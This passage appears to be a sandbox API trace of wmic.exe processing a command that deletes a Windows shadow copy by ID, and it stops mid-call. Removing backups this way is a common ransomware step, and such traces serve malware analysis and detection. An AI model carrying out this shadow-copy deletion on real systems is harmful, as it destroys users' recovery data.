(_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0103.802] malloc (_Size=0x16) returned 0x15cb00 [0103.802] malloc (_Size=0x8) returned 0x157140 [0103.802] free (_Block=0x0) [0103.802] free (_Block=0x15cae0) [0103.802] lstrlenW (lpString=" shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete") returned 71 [0103.802] malloc (_Size=0xc) returned 0x15cae0 [0103.802] lstrlenW (lpString="where") returned 5 [0103.802] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0103.802] malloc (_Size=0xc) returned 0x15cb20 [0103.802] malloc (_Size=0x10) returned 0x15cb40 [0103.802] memmove_s (in: _Destination=0x15cb40, _DestinationSize=0x8, _Source=0x157140, _SourceSize=0x8 | out: _Destination=0x15cb40) returned 0x0 [0103.802] free (_Block=0x157140) [0103.802] free (_Block=0x0) [0103.802] free (_Block=0x15cae0) [0103.802] lstrlenW (lpString=" shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete") returned 71 [0103.803] malloc (_Size=0x5c) returned 0x15cec0 [0103.803] lstrlenW (lpString="\"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\"") returned 45 [0103.803] _wcsicmp (_String1="\"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\"", _String2="\"NULL\"") returned -5 [0103.803] lstrlenW (lpString="\"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\"") returned 45 [0103.803] lstrlenW (lpString="\"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\"") returned 45 [0103.803] malloc (_Size=0x5c) returned 0x15cf30 [0103.803] malloc (_Size=0x18) returned 0x15cae0 [0103.803] memmove_s (in: _Destination=0x15cae0, _DestinationSize=0x10, _Source=0x15cb40, _SourceSize=0x10 | out: _Destination=0x15cae0) returned 0x0 [0103.803] free (_Block=0x15cb40) [0103.803] free (_Block=0x0) [0103.803] free (_Block=0x15cec0) [0103.803] lstrlenW (lpString=" shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete") returned 71 [0103.803] malloc (_Size=0xe) returned 0x15cb40 [0103.803] lstrlenW (lpString="delete") returned 6 [0103.803] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0103.803] malloc (_Size=0xe) returned 0x15cb60 [0103.803] malloc (_Size=0x20) returned 0x15cec0 [0103.803] memmove_s (in: _Destination=0x15cec0, _DestinationSize=0x18, _Source=0x15cae0, _SourceSize=0x18 | out: _Destination=0x15cec0) returned 0x0 [0103.803] free (_Block=0x15cae0) [0103.803] free (_Block=0x0) [0103.803] free (_Block=0x15cb40) [0103.803] malloc (_Size=0x20) returned 0x15cef0 [0103.803] lstrlenW (lpString="QUIT") returned 4 [0103.803] lstrlenW (lpString="shadowcopy") returned 10 [0103.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0103.804] lstrlenW (lpString="EXIT") returned 4 [0103.804] lstrlenW (lpString="shadowcopy") returned 10 [0103.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0103.804] free (_Block=0x15cef0) [0103.804] WbemLocator:IUnknown:AddRef (This=0x1ea1390) returned 0x2 [0103.804] malloc (_Size=0x20) returned 0x15cef0 [0103.804] lstrlenW (lpString="/") returned 1 [0103.804] lstrlenW (lpString="shadowcopy") returned 10 [0103.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0103.804] lstrlenW (lpString="-") returned 1 [0103.804] lstrlenW (lpString="shadowcopy") returned 10 [0103.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0103.804] lstrlenW (lpString="CLASS") returned 5 [0103.804] lstrlenW (lpString="shadowcopy") returned 10 [0103.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0103.804] lstrlenW (lpString="PATH") returned 4 [0103.804] lstrlenW (lpString="shadowcopy") returned 10 [0103.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0103.804] lstrlenW (lpString="CONTEXT") returned 7 [0103.804] lstrlenW (lpString="shadowcopy") returned 10 [0103.805] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0103.805] lstrlenW (lpString="shadowcopy") returned 10 [0103.805] malloc (_Size=0x16) returned 0x15cb40 [0103.805] lstrlenW (lpString="shadowcopy") returned 10 [0103.805] GetCurrentThreadId () returned 0xa0c [0103.805] ??0CHString@@QEAA@XZ () returned 0x22f440 [0103.805] malloc (_Size=0x18) returned 0x15cae0 [0103.805] malloc (_Size=0x18) returned 0x15cb80 [0103.805] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1ea1390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff432998 | out: ppNamespace=0xff432998*=0x1eb3a98) returned 0x0 [0103.836] free (_Block=0x15cb80) [0103.836] free (_Block=0x15cae0) [0103.836] CoSetProxyBlanket (pProxy=0x1eb3a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0103.836] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0103.836] GetCurrentThreadId () returned 0xa0c [0103.836] ??0CHString@@QEAA@XZ () returned 0x22f2d8 [0103.836] malloc (_Size=0x18) returned 0x15cae0 [0103.836] malloc (_Size=0x18) returned 0x15cb80 [0103.836] malloc (_Size=0x18) returned 0x15cba0 [0103.836] malloc (_Size=0x18) returned 0x15cbc0 [0103.836] SysStringLen (param_1="root\\cli") returned 0x8 [0103.836] SysStringLen (param_1="\\") returned 0x1 [0103.837] malloc (_Size=0x18) returned 0x15cbe0 [0103.837] SysStringLen (param_1="root\\cli\\") returned 0x9 [0103.837] SysStringLen (param_1="ms_409") returned 0x6 [0103.837] free (_Block=0x15cbc0) [0103.837] free (_Block=0x15cba0) [0103.837] free (_Block=0x15cb80) [0103.837] free (_Block=0x15cae0) [0103.837] malloc (_Size=0x18) returned 0x15cae0 [0103.837] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1ea1390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4329a0 | out: ppNamespace=0xff4329a0*=0x1eb3b28) returned 0x0 [0103.842] free (_Block=0x15cae0) [0103.842] free (_Block=0x15cbe0) [0103.842] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0103.842] GetCurrentThreadId () returned 0xa0c [0103.842] ??0CHString@@QEAA@XZ () returned 0x22f450 [0103.842] malloc (_Size=0x18) returned 0x15cbe0 [0103.842] malloc (_Size=0x18) returned 0x15cae0 [0103.842] malloc (_Size=0x18) returned 0x15cb80 [0103.842] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0103.842] malloc (_Size=0x3a) returned 0x15cfa0 [0103.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff3c1980, cbMultiByte=-1, lpWideCharStr=0x15cfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0103.843] free (_Block=0x15cfa0) [0103.843] malloc (_Size=0x18) returned 0x15cba0 [0103.843] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0103.843] SysStringLen (param_1="shadowcopy") returned 0xa [0103.843] malloc (_Size=0x18) returned 0x15cbc0 [0103.843] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0103.843] SysStringLen (param_1="'") returned 0x1 [0103.843] free (_Block=0x15cba0) [0103.843] free (_Block=0x15cb80) [0103.843] free (_Block=0x15cae0) [0103.843] free (_Block=0x15cbe0) [0103.843] IWbemServices:GetObject (in: This=0x1eb3a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x22f458*=0x0, ppCallResult=0x0 | out: ppObject=0x22f458*=0x1ec04e0, ppCallResult=0x0) returned 0x0 [0103.850] malloc (_Size=0x18) returned 0x15cbe0 [0103.850] IWbemClassObject:Get (in: This=0x1ec04e0, wszName="Target", lFlags=0, pVal=0x22f380*(varType=0x0, wReserved1=0xff43, wReserved2=0x0, wReserved3=0x0, varVal1=0xff432998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x22f380*(varType=0x8, wReserved1=0xff43, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.850] free (_Block=0x15cbe0) [0103.850] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0103.850] malloc (_Size=0x3e) returned 0x15cfa0 [0103.850] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0103.851] malloc (_Size=0x18) returned 0x15cbe0 [0103.851] IWbemClassObject:Get (in: This=0x1ec04e0, wszName="PWhere", lFlags=0, pVal=0x22f380*(varType=0x0, wReserved1=0xff43, wReserved2=0x0, wReserved3=0x0, varVal1=0x31e298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x22f380*(varType=0x8, wReserved1=0xff43, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.851] free (_Block=0x15cbe0) [0103.851] lstrlenW (lpString=" Where ID = '#'") returned 15 [0103.851] malloc (_Size=0x20) returned 0x15cff0 [0103.851] lstrlenW (lpString=" Where ID = '#'") returned 15 [0103.851] malloc (_Size=0x18) returned 0x15cbe0 [0103.851] IWbemClassObject:Get (in: This=0x1ec04e0, wszName="Connection", lFlags=0, pVal=0x22f380*(varType=0x0, wReserved1=0xff43, wReserved2=0x0, wReserved3=0x0, varVal1=0x36bd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x22f380*(varType=0xd, wReserved1=0xff43, wReserved2=0x0, wReserved3=0x0, varVal1=0x1ec09c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.851] free (_Block=0x15cbe0) [0103.851] IUnknown:QueryInterface (in: This=0x1ec09c0, riid=0xff3c7360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x22f370 | out: ppvObject=0x22f370*=0x1ec09c0) returned 0x0 [0103.851] GetCurrentThreadId () returned 0xa0c [0103.851] ??0CHString@@QEAA@XZ () returned 0x22f298 [0103.851] malloc (_Size=0x18) returned 0x15cbe0 [0103.851] IWbemClassObject:Get (in: This=0x1ec09c0, wszName="Namespace", lFlags=0, pVal=0x22f2c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff3d738f, varVal2=0x15cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x22f2c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x15cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.852] free (_Block=0x15cbe0) [0103.852] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0103.852] malloc (_Size=0x16) returned 0x15cbe0 [0103.852] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0103.852] malloc (_Size=0x18) returned 0x15cae0 [0103.852] IWbemClassObject:Get (in: This=0x1ec09c0, wszName="Locale", lFlags=0, pVal=0x22f2c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x39a648, varVal2=0x15cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x22f2c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x15cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.852] free (_Block=0x15cae0) [0103.852] lstrlenW (lpString="ms_409") returned 6 [0103.852] malloc (_Size=0xe) returned 0x15cae0 [0103.852] lstrlenW (lpString="ms_409") returned 6 [0103.852] malloc (_Size=0x18) returned 0x15cb80 [0103.852] IWbemClassObject:Get (in: This=0x1ec09c0, wszName="User", lFlags=0, pVal=0x22f2c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x39a648, varVal2=0x15cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x22f2c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x39a648, varVal2=0x15cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.852] free (_Block=0x15cb80) [0103.852] malloc (_Size=0x18) returned 0x15cb80 [0103.852] IWbemClassObject:Get (in: This=0x1ec09c0, wszName="Password", lFlags=0, pVal=0x22f2c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x39a648, varVal2=0x15cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x22f2c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x39a648, varVal2=0x15cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.852] free (_Block=0x15cb80) [0103.852] malloc (_Size=0x18) returned 0x15cb80 [0103.853] IWbemClassObject:Get (in: This=0x1ec09c0, wszName="Server", lFlags=0, pVal=0x22f2c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x39a648, varVal2=0x15cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x22f2c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x15cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.853] free (_Block=0x15cb80) [0103.853] lstrlenW (lpString=".") returned 1 [0103.853] malloc (_Size=0x4) returned 0x157140 [0103.853] lstrlenW (lpString=".") returned 1 [0103.853] malloc (_Size=0x18) returned 0x15cb80 [0103.853] IWbemClassObject:Get (in: This=0x1ec09c0, wszName="Authority", lFlags=0, pVal=0x22f2c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x39a648, varVal2=0x15cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x22f2c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x39a648, varVal2=0x15cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.853] free (_Block=0x15cb80) [0103.853] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0103.853] IUnknown:Release (This=0x1ec09c0) returned 0x1 [0103.853] GetCurrentThreadId () returned 0xa0c [0103.853] ??0CHString@@QEAA@XZ () returned 0x22f298 [0103.853] malloc (_Size=0x18) returned 0x15cb80 [0103.853] IWbemClassObject:Get (in: This=0x1ec04e0, wszName="__RELPATH", lFlags=0, pVal=0x22f2c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x39a648, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x22f2c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0103.853] free (_Block=0x15cb80) [0103.853] malloc (_Size=0x18) returned 0x15cb80 [0103.854] GetCurrentThreadId () returned 0xa0c [0103.854] ??0CHString@@QEAA@XZ () returned 0x22f118 [0103.854] ??0CHString@@QEAA@PEBG@Z () returned 0x22f130 [0103.854] ??0CHString@@QEAA@AEBV0@@Z () returned 0x22f0c0 [0103.854] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0103.854] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x15d020 [0103.854] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0103.854] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x22f080 [0103.854] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x22f0c8 [0103.854] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x22f130 [0103.854] ??1CHString@@QEAA@XZ () returned 0x11702701 [0103.854] ??1CHString@@QEAA@XZ () returned 0x11702701 [0103.854] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x22f088 [0103.854] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x22f0c0 [0103.854] ??1CHString@@QEAA@XZ () returned 0x1 [0103.854] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x15d090 [0103.854] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0103.854] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x22f080 [0103.854] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x22f0c8 [0103.854] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x22f130 [0103.854] ??1CHString@@QEAA@XZ () returned 0x11702701 [0103.855] ??1CHString@@QEAA@XZ () returned 0x11702701 [0103.855] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x22f088 [0103.855] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x22f0c0 [0103.855] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0103.855] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0103.855] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0103.855] malloc (_Size=0x18) returned 0x15cba0 [0103.855] malloc (_Size=0x18) returned 0x15cc00 [0103.855] malloc (_Size=0x18) returned 0x15cc20 [0103.855] malloc (_Size=0x18) returned 0x15cc40 [0103.855] malloc (_Size=0x18) returned 0x15cc60 [0103.855] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0103.855] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0103.855] malloc (_Size=0x18) returned 0x15cc80 [0103.855] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0103.855] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0103.855] malloc (_Size=0x18) returned 0x15cca0 [0103.856] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0103.856] SysStringLen (param_1="\"") returned 0x1 [0103.856] free (_Block=0x15cc80) [0103.856] free (_Block=0x15cc60) [0103.856] free (_Block=0x15cc40) [0103.856] free (_Block=0x15cc20) [0103.856] free (_Block=0x15cc00) [0103.856] free (_Block=0x15cba0) [0103.856] IWbemServices:GetObject (in: This=0x1eb3b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x22f108*=0x0, ppCallResult=0x0 | out: ppObject=0x22f108*=0x1ec0a50, ppCallResult=0x0) returned 0x0 [0103.858] malloc (_Size=0x18) returned 0x15cba0 [0103.858] IWbemClassObject:Get (in: This=0x1ec0a50, wszName="Text", lFlags=0, pVal=0x22f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff432ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x22f140*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x394aa0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x31e030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0103.858] free (_Block=0x15cba0) [0103.858] SafeArrayGetLBound (in: psa=0x394aa0, nDim=0x1, plLbound=0x22f120 | out: plLbound=0x22f120) returned 0x0 [0103.858] SafeArrayGetUBound (in: psa=0x394aa0, nDim=0x1, plUbound=0x22f110 | out: plUbound=0x22f110) returned 0x0 [0103.858] SafeArrayGetElement (in: psa=0x394aa0, rgIndices=0x22f104, pv=0x22f158 | out: pv=0x22f158) returned 0x0 [0103.858] malloc (_Size=0x18) returned 0x15cba0 [0103.858] malloc (_Size=0x18) returned 0x15cc00 [0103.858] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0103.858] free (_Block=0x15cba0) [0103.858] IUnknown:Release (This=0x1ec0a50) returned 0x0 [0103.858] free (_Block=0x15cca0) [0103.858] ??1CHString@@QEAA@XZ () returned 0x11702701 [0103.858] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0103.858] free (_Block=0x15cb80) [0103.859] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0103.859] lstrlenW (lpString="Shadow copy management.") returned 23 [0103.859] malloc (_Size=0x30) returned 0x1585c0 [0103.859] lstrlenW (lpString="Shadow copy management.") returned 23 [0103.859] free (_Block=0x15cc00) [0103.859] IUnknown:Release (This=0x1ec04e0) returned 0x0 [0103.859] free (_Block=0x15cbc0) [0103.859] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0103.859] lstrlenW (lpString="PATH") returned 4 [0103.859] lstrlenW (lpString="where") returned 5 [0103.859] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0103.859] lstrlenW (lpString="WHERE") returned 5 [0103.859] lstrlenW (lpString="where") returned 5 [0103.859] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0103.859] lstrlenW (lpString="/") returned 1 [0103.859] lstrlenW (lpString="ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'") returned 43 [0103.859] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0103.859] lstrlenW (lpString="-") returned 1 [0103.859] lstrlenW (lpString="ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'") returned 43 [0103.859] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0103.859] lstrlenW (lpString="ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'") returned 43 [0103.859] malloc (_Size=0x58) returned 0x15d020 [0103.860] lstrlenW (lpString="ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'") returned 43 [0103.860] lstrlenW (lpString="/") returned 1 [0103.860] lstrlenW (lpString="delete") returned 6 [0103.860] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0103.860] lstrlenW (lpString="-") returned 1 [0103.860] lstrlenW (lpString="delete") returned 6 [0103.860] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0103.860] lstrlenW (lpString="delete") returned 6 [0103.860] malloc (_Size=0xe) returned 0x15cbc0 [0103.860] lstrlenW (lpString="delete") returned 6 [0103.860] lstrlenW (lpString="GET") returned 3 [0103.860] lstrlenW (lpString="delete") returned 6 [0103.860] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0103.860] lstrlenW (lpString="LIST") returned 4 [0103.860] lstrlenW (lpString="delete") returned 6 [0103.860] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0103.860] lstrlenW (lpString="SET") returned 3 [0103.860] lstrlenW (lpString="delete") returned 6 [0103.860] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0103.860] lstrlenW (lpString="CREATE") returned 6 [0103.860] lstrlenW (lpString="delete") returned 6 [0103.860] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0103.860] lstrlenW (lpString="CALL") returned 4 [0103.860] lstrlenW (lpString="delete") returned 6 [0103.860] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0103.860] lstrlenW (lpString="ASSOC") returned 5 [0103.860] lstrlenW (lpString="delete") returned 6 [0103.860] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0103.861] lstrlenW (lpString="DELETE") returned 6 [0103.861] lstrlenW (lpString="delete") returned 6 [0103.861] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0103.861] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0103.861] malloc (_Size=0x3e) returned 0x15d080 [0103.861] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0103.861] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0103.861] malloc (_Size=0x18) returned 0x15cc00 [0103.861] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0103.861] lstrlenW (lpString="FROM") returned 4 [0103.861] lstrlenW (lpString="*") returned 1 [0103.861] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0103.861] malloc (_Size=0x18) returned 0x15cb80 [0103.861] free (_Block=0x15cc00) [0103.861] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0103.861] lstrlenW (lpString="FROM") returned 4 [0103.861] lstrlenW (lpString="from") returned 4 [0103.861] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0103.861] malloc (_Size=0x18) returned 0x15cc00 [0103.861] free (_Block=0x15cb80) [0103.862] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0103.862] malloc (_Size=0x18) returned 0x15cb80 [0103.862] free (_Block=0x15cc00) [0103.862] free (_Block=0x15d080) [0103.862] free (_Block=0x15cb80) [0103.862] lstrlenW (lpString="SET") returned 3 [0103.862] lstrlenW (lpString="delete") returned 6 [0103.862] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0103.862] lstrlenW (lpString="CREATE") returned 6 [0103.862] lstrlenW (lpString="delete") returned 6 [0103.862] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0103.862] free (_Block=0x15cef0) [0103.862] malloc (_Size=0x8) returned 0x156f20 [0103.862] lstrlenW (lpString="GET") returned 3 [0103.862] lstrlenW (lpString="delete") returned 6 [0103.862] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0103.862] lstrlenW (lpString="LIST") returned 4 [0103.862] lstrlenW (lpString="delete") returned 6 [0103.862] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0103.862] lstrlenW (lpString="ASSOC") returned 5 [0103.862] lstrlenW (lpString="delete") returned 6 [0103.862] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0103.862] WbemLocator:IUnknown:AddRef (This=0x1ea1390) returned 0x3 [0103.862] free (_Block=0x3fdfb0) [0103.863] lstrlenW (lpString="") returned 0 [0103.863] lstrlenW (lpString="XDUWTFONO") returned 9 [0103.863] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0103.863] lstrlenW (lpString="XDUWTFONO") returned 9 [0103.863] malloc (_Size=0x14) returned 0x15cb80 [0103.863] lstrlenW (lpString="XDUWTFONO") returned 9 [0103.863] GetCurrentThreadId () returned 0xa0c [0103.863] GetCurrentProcess () returned 0xffffffffffffffff [0103.863] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x22f4e0 | out: TokenHandle=0x22f4e0*=0x27c) returned 1 [0103.863] GetTokenInformation (in: TokenHandle=0x27c, 